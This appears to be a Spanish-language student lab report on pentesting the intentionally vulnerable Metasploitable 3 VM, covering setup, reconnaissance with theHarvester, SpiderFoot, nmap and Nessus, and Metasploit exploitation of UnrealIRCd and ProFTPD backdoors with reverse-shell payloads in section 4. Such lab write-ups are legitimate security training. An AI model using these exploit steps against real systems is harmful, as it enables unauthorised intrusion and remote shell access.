Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                

Metasploitable 3

Descargar como docx, pdf o txt
Descargar como docx, pdf o txt
Está en la página 1de 22

Objetivos

Realizar pruebas de penetración, reconociendo vulnerabilidades para realizar su


explotación a la maquina virtual propuesta.

1. Instalación

Para la realización del laboratorio dos donde se propone realizar pruebas de pentesting, se
ejecutará bajo dos herramientas las cuales serán virtualizadas, una es la distribución de Kali Linux y
la otra es la maquina virtual metasploitable 3, esta última para su instalación se la realiza una serie
de pasos los cuales fueron

1. Ternes descargado los siguientes programas y su respectiva instalación


 VirtualBox
 Packer
 Vagrant

2. Ya instalado los anteriores programas se descarga metasploitable 3 del siguiente link

https://github.com/rapid7/metasploitable3.git

ya descargado se o descomprime y lo ubica en una ruta donde podamos tener acceso.

3. Se abre una consolo de power Shell para ejecutar la siguiente línea

cd metasploitable3

que me permitirá ingresar a la ruta donde tengo descargado el metasploitable 3


4. Se da paso a la construcción de la imagen para la máquina virtual el primer parámetro –
only que será igual a la maquina virtual instalada más el archivo de plantilla que se
instalará en nuestro caso Ubuntu_1404.json, esta construcción sucede bajo la siguiente
línea en el power Shell:

packer build --only=virtualbox-iso ./packer/templates/ubuntu_1404.json

con esto iniciara en empaquetado de la imagen a iso.

5. Ahora crearemos la ova de la con todo el software necesario de la maquina aquí se ejecuta
la instalación de metasploitable 3 como se muestra en la imagen con la siguiente liena de
código

vagrant box add packer/builds/ubuntu_1404_virtualbox_0.1.12.box --


name=metasploitable3-ub1404
6. Iniciamos la maquina virtual con la línea de comandos

vagrant up ub1404

así ya podríamos visualizar en virtual Box la maquina virtual en la lista.


Iniciamos la máquina virtual de metasploitable 3 que pedirá para su inicio de sesión el
login y la contraseña los cuales son:

Login: vagrant
Contraseña: vagrant
2. Configuración

Para realizar las labores pentesting en la configuración de la maquina de virtual de


metasploitable3 en la opción de red se le indica que usara un adaptador de puente para que
la nueva maquina virtual quede en el mismo segmento de red.

Ahora ya iniciada las dos maquinas virtuales se procede a verificar sus IP para realizar los
respectivos ping.
Se realiza un ping de metasploitable a la máquina virtual Kali Linux satisfactoriamente

Ping 192.168.0.28

Mediante el cliente de Kali se ingresa por medio del explorador firefox a la ip de metasploitable
resultado que podemos tener acceso a el servidor web
3. Herramientas

Para la realización de las pruebas se realiza una serie de pasos y recolección de información bajo
una serie de herramientas basadas en OSINT

a) Se inicia con la herramienta theharvester la que me permitirá recolectar información y conocer


la visibilidad de la máquina virtual en la red.

Si en el caso de que los servicios estuvieran montados en hosting reales la herramienta podría
recopilar nombres de subdominios, direcciones de correo electrónico, hosts virtuales,
Bajo la línea de comando en Kali linux

Theharvester -d 192.168.0.19 -l 500 -b google -f resultado.html

La herramienta realiza su proceso de recolección de información de diferentes fuentes públicas y


generar un archivo html el cual visualizaremos los resultados que se encontrado.
Para este caso realizando la inspección en la dirección IP de la metasploitable se establece que se
encuentra los correo electrónico pi@192.168.0.19 – root@192.168.0.19 y que se acceden bajo
host con IP 192.168.0.19.

b) otra herramienta que se utilizo fue la spiderfoot que bajo la consoló de Kali linux se la ejecuta
bajo el comando

./sp.py

Este comando se lo ejecuta teniendo en cuenta que se debe instalar con anterioridad Python,

Pip, mako, con estas librerías ya isntaladas, se ejecuta la línea de comando anterior y el programa
genera bajo el localhost y un puerto que el define el programa via web
De tal manera que copiamos la ruta que aparece en la terminal y la pegamos en un navegador
generando una pagina donde debemos escribir el nombre del nuevo scanner que realizaremos y la
IP o domino a escanear como se muestra a continuación

Finalmente, se le da en el botón run scanner y se obtendrá la información de la IP que se digita de


esta forma:
De este scanner podemos sacar información como son los puertos abiertos TCP para la dirección
IP del metasploitable

c) ahora conociendo puertos abiertos y utilizados con el sistema verificaremos el servicio que esta
corriendo y esto lo realizaremos bajo la herramienta NMAP que resulta ser un mapeador de
puertos, con esta se identificara el nombre del servicio y versión.

Ejecutaremos el comando para verificar los puertos y servicios y versión

Nmap -sV 192.168.0.19


Con esto ratificamos los puertos que estaban abiertos y que descubrimos con la herramienta
spiderfoot, con lo anterior podremos dedicarnos a buscar vulnerabilidades en dichos puertos.

También realizamos el scanner de vulnerabilidades con la herramienta Nessus quien gestionara y


realizara un scanner.

Después de su instalación Iniciamos Nessus en un explorador digitando

https://kali:8834

Con lo anterior, cargara la interfaz del escáner para continuar con el proceso de escáner daremos
clic en el botón New Scan

Con esto se abrirá un formulario donde escribiremos un nombre de scanner que realizaremos una
descripción y la IP de la maquina o maquinas a realizar el escaneo de vulnerabilidades.

Después le daremos clic al botón Save, continuamos en la pantalla principal donde le daremos clic
en el botón indicado en la imagen siguiente:
Con lo anterior el scanner iniciara su proceso

Ahora nos dirigimos a la pestaña de vulnerabilities para visualizar las vulnerabilidades encontradas
Para nuestro caso se encontró un total de 50 vulnerabilidades entre ellas tenemos

1 de vulnerabilidad critica

3 de vulnerabilidad media

2 de vulnerabilidad baja

Y el resto son de información.

Con lo anterior podremos continuar con el análisis de lo encontrado y verificar sus posibles
explotaciones de dichas vulnerabilidades.

Nos apoyaremos de la herramienta metasploit de la máquina virtual kali Linux.


4. Explotación de vulnerabilidades

Inicialmente confirmaremos lo escaneado con Nessus con la escaneo de puertos con la


herramienta nmap anteriormente descrita.

4.1 Vulnerabilidad Puerto 6697: UnrealIRCd

Servicio que sirve establecer mantener conversaciones tiempo real normalmente utilizados para
chat, existe un exploit que abre una puerta trasera con el cual podemos acceder a una sesión de u
usuario.

Con referencia CVE-2010-2075

Esta referencia la encontré en la página https://www.rapid7.com/ la que o explica los paso a


realizar

Para explotar se realizará con metasploit, iniciamos ejecutando la consola de mestasploit con la
línea

msfconsole

saldrá la inicialización del metasploit


Ahora buscamos en la base de datos de matasploit el nombre del exploit (unrealircd) con la line :

Search unrealircd

Mostrando un resultado el cual lo utilizaremos para esto digitamos la línea de comando como se
muestra a continuación

Use exploit/unix/irc/unreal_ircd_3281_backdoor
Ahora digitaremos la linea

Show options

Con line nos mostrara las opciones o parámetros que debemos definir para el ataque

Para este caso debemos definir parámetros RHOSTS que es la dirección de la maquina víctima, se
definirá el puerto del servicio que es vulnerable, se define la carga de payload que no es nada menos
un escript que contiene datos útiles para ser enviados, se defina el LHOST que es la dirección IP de
la máquina que realiza la explotación.

set rhost 192.168.0.35

set rport 6697

set payload cmd/unix/reverse_ruby

set lhost 192.168.0.34

quedando así
Finalizamos con la línea de comandos

run

para inicialice la explotación, al finalizar el proceso en la consola nos mostrara un mensaje


diciendo que se abrió una sesión como se muestra a continuación:

Ahora digitaremos
whoami para saber con qué usuario estamos ingresandoen nuestro caso es una cuenta de nombre
boba_fett, además digitaremos hostname para conocer el nombre del maquina explotada, como
también con la línea uname –a conoceremos alguna descripción de la arquitectura de la máquina,
como su versión de sistema.

4.2 Vulnerabilidad Puerto 21: ProFTPD versión 1.3.5

Se trata de una vulnerabilidad del servicio ftp para esto utilizaremos, un exploit que abre una
puerta trasera con el cual podemos acceder a una sesión de un usuario.

Con referencia CVE-2015-3306

Esta referencia la encontré en la página https://www.rapid7.com/ la que o explica los paso a


realizar

Se abrirá en una terminal con metasploit como se realizó en la explotación anterior,

Teniendo el metasploit corriendo buscaremos el exploit denominado proftpd_modcopy_exec de


tal forma que con el comando

search proftpd

nos muestra una lista de los exploit que contengan dicha palabra
De tal forma que ubicado el exploit con el nombre proftpd_modcopy_exec ledaremosusopara
eso digitaremos en consola

Use exploit/unix/ftp/proftpd_modcopy_exec

Ahora digitaremos la línea

show options

Nos mostrara las opciones o parámetros que debemos definir para el ataque
Para este caso debemos definir parámetros RHOSTS que es la dirección de la maquina víctima, se
definirá el puerto del servicio que es vulnerable, se define sitepath , se defina el LHOST que es la
dirección IP de la máquina que realiza la explotación.

set rhost 192.168.0.53 (es diferente la ip con respecto al anterior ataque por que la máquina
virtual metasploitable3 está configurada con ip dinámica)

set sitepath /var/www/html

set exploit cmd/unix/reverse_perl

quedando así

Finalizamos con la línea de comandos

run

para inicialice la explotación, al finalizar el proceso en la consola nos mostrara un mensaje


diciendo que se abrió una sesión como se muestra a continuación:
Ahora digitaremos

whoami para saber con qué usuario estamos ingresando en nuestro caso es una cuenta de nombre
www-data, además digitaremos hostname para conocer el nombre del maquina explotada, como
también con la línea uname –a conoceremos alguna descripción de la arquitectura de la máquina,
como su versión de sistema.

También podría gustarte